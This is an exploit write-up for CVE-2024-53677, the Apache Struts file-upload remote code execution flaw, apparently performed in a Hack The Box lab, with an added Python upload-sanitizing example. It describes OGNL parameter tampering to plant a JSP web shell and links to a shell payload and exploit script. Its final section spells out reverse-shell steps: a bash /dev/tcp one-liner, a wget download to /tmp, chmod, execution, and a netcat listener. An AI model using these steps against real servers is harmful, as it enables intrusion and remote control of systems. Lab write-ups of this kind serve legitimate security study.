## https://sploitus.com/exploit?id=B2895D60-6C45-5425-B3E3-BBB88FD2D755
# CVE-2024-53677 Exploitation  
### Apache Struts RCE via File Upload  


## Description
CVE-2024-53677 is a vulnerability which impacts Apache Struts from 2.0.0 before 6.4.0. **⚠️ This was exploited in a Hack The Box lab.**

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload parameters to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. 
🔗 **Reference:** [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2024-53677) 
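As an added mitigation example (not code from this writeup or from Apache Struts), the following Python shows how an upload handler can neutralise the traversal described above: it reduces whatever filename the server ends up using to a single path component, enforces the JPG/JPEG/PNG/GIF allowlist the target site used, and confirms the resolved path stays under the upload root. The root `/var/www/uploads` and the function names are assumptions.

```python
import re
from pathlib import Path
from typing import Optional

# Allowlist matching the target site's accepted image types (from the writeup).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Assumed upload root; in the writeup uploads landed under /uploads/<timestamp>/.
UPLOAD_ROOT = Path("/var/www/uploads")


def sanitize_filename(user_name: str) -> str:
    """Reduce a client-supplied filename to one safe path component.

    Directory parts (with '/' or '\\'), NUL bytes and leading dots are dropped,
    so '../../shell.jsp' collapses to 'shell.jsp' and cannot leave the folder.
    """
    name = user_name.replace("\\", "/").split("/")[-1]
    name = name.replace("\x00", "").strip().lstrip(".")
    # Conservative character set; anything else becomes '_'.
    return re.sub(r"[^A-Za-z0-9._-]", "_", name)


def extension_allowed(name: str) -> bool:
    """Check only the final extension. 'shell.jsp.png' passes this test, which
    is why the upload root must additionally never be served as executable."""
    if "." not in name:
        return False
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def resolve_upload_path(user_name: str, subdir: str,
                        root: Path = UPLOAD_ROOT) -> Optional[Path]:
    """Return where an upload may be written, or None if it must be rejected.

    `subdir` is the server-generated timestamp folder (e.g. '20250213_014317')
    and is never taken from the request, so the client controls only the leaf.
    """
    name = sanitize_filename(user_name)
    if not name or not extension_allowed(name):
        return None
    target = (root / subdir / name).resolve()
    # Defence in depth: verify the resolved path is still inside the root.
    try:
        target.relative_to(root.resolve())
    except ValueError:
        return None
    return target
```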


## Reconnaissance 
### **Identifying an Attack Vector** 


1. The website has an **image upload** feature.
2. Uploaded files are stored at: `ip/uploads/20250213_014317/starwars.png`
3. On successful upload, the sharable link of the image has the URL `ip/s/04ab2f40`
4. Finding the Apache Struts Version
  - An exposed `pom.xml` revealed **Apache Struts 6.3.0.1**
  - Confirmed vulnerable to **CVE-2024-53677**  

📸 **pom.xml exposure:**  



## Exploitation
### **Modifying File Upload Request**  
To exploit this vulnerability we utilise **BurpSuite** and its **Repeater** functionality to modify the request before sending it. Below we have an unedited request.




Our issues are that the site **blocks** file types other than **[JPG, JPEG, PNG, GIF]** and that anything in the /uploads directory is **not executable**. To get around these issues we will first add another parameter.



The added parameter exploits OGNL (Object-Graph Navigation Language), which Apache Struts uses to process input data. The FileUploadInterceptor processes this parameter before handling the actual PNG image, allowing attackers to manipulate the request and potentially execute arbitrary code.

### **Finalising the Exploit**  
After adding the modified parameter, the server response confirms that the file was successfully uploaded. However, we notice that the file path differs from the usual upload directory.




#### **Attaching the Payload**  
Next, we embed the payload by appending it directly below the image data and right before our injected parameters. The shell payload can be sourced from: 🔗 **Reference:** [shell.jsp](https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp)
Additionally, one crucial detail is that the request requires "Upload" with a capital U instead of lowercase "upload". This follows the exploit structure observed in: 🔗 **Reference:** [exploit.py](https://github.com/EQSTLab/CVE-2024-53677/blob/main/CVE-2024-53677.py)

With these modifications in place, we send the request. The server responds similarly, confirming a successful upload and reflecting the adjusted file path.
#### **Navigating the Exploit**  
Now, by navigating to the following URL, we can interact with our uploaded shell.
`ip/shelll.jsp?action=cmd&cmd=id`


At this stage, we can establish a reverse shell using a locally hosted web server. A simple way to achieve this is with Python's built-in server (the `-m` module flag comes before the port):
`python3 -m http.server 3004`

Next, create a basic shell script (e.g., shell.sh), with `$IP` and `$PORT` set to the listener's address and port:
`echo "bash -i >& /dev/tcp/$IP/$PORT 0>&1" > shell.sh`

Use wget to download it to a file (`-O` takes a file path, not a directory):
`wget http://ip_address/filename -O /tmp/filename`

After downloading, give it execution permissions:
`chmod +x /tmp/filename`

Then use nc (netcat) to listen for the reverse shell:
`nc -lvnp $PORT`

Finally, execute the script:
`/tmp/filename`